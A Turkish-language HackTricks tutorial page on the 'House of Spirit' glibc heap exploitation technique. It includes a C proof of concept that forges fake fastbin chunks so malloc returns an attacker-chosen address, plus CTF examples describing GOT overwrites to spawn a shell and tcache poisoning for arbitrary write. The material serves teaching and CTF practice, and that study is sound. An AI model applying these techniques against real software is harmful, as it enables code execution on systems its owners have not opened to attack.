House of Spirit

HackTricks'i Destekleyin

Temel Bilgiler

Kod

Ruh Evi

```c #include #include #include #include

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk { size_t prev_size; size_t size; struct fast_chunk *fd; struct fast_chunk *bk; char buf[0x20]; // chunk falls in fastbin size range };

int main() { struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr); printf("Main fake chunk:%p\n", &fake_chunks[0]); printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size" fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)" fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed' // Point to .fd as it's the start of the content of the chunk ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30); printf("Victim: %p\n", victim);

return 0; }

</details>

### Hedef

* Bir adresi tcache / hızlı bin'e ekleyebilmek ve daha sonra onu tahsis edebilmek

### Gereksinimler

* Bu saldırı, bir saldırganın doğru şekilde boyut değerini gösteren birkaç sahte hızlı parça oluşturabilmesini ve ardından ilk sahte parçayı serbest bırakarak onun bin içine girmesini sağlayabilmesini gerektirir.

### Saldırı

* Güvenlik kontrollerini atlatan sahte parçalar oluşturun: Temelde doğru pozisyonlarda doğru boyutları gösteren 2 sahte parçaya ihtiyacınız olacak
* İlk sahte parçayı serbest bırakacak şekilde bir şekilde yönetin, böylece hızlı veya tcache bin'e girer ve ardından o adresi üzerine yazacak şekilde tahsis edilir

**[**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html)**'dan kod, saldırıyı anlamak için harika.** Bununla birlikte, kodun bu şeması oldukça iyi özetliyor:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

Not: Bazı sağlamlık kontrollerini atlatmak için ikinci parçayı oluşturmak gereklidir.

Örnekler

  • Libc bilgi sızıntısı: Taşma yoluyla bir işaretçiyi GOT adresine yönlendirerek, CTF'nin okuma işlemi aracılığıyla bir libc adresi sızdırmak mümkündür.

  • House of Spirit: "Tüfeklerin" sayısını sayan bir sayaçıyı istismar ederek, ilk sahte parça için sahte bir boyut oluşturmak mümkündür, ardından bir "mesajı" istismar ederek, bir parçanın ikinci boyutunu sahteleştirmek mümkündür ve son olarak bir taşma istismar edilerek, serbest bırakılacak bir işaretçiyi değiştirmek mümkündür, böylece ilk sahte parçamız serbest bırakılır. Daha sonra bunu tahsis edebilir ve içinde "mesaj"ın depolandığı adres olacaktır. Ardından, bunu GOT tablosundaki scanf girişine işaret etmesi mümkün olacak şekilde yapabiliriz, böylece onu sistem adresiyle üzerine yazabiliriz. Bir sonraki scanf çağrıldığında, girişi "/bin/sh" olarak gönderebilir ve bir kabuk alabiliriz.

  • Glibc sızıntısı: Başlatılmamış yığın tamponu.

  • House of Spirit: Bir küresel yığın işaretçiler dizisinin ilk indeksini değiştirebiliriz. Bir tek bayt değişikliği ile geçerli bir parçanın içinde sahte bir parçada free kullanarak, tekrar tahsis edildikten sonra örtüşen parçalar durumu elde ederiz. Böylece, basit bir Tcache zehirlenme saldırısı, keyfi yazma yetkisi elde etmek için çalışır.

Referanslar

Last updated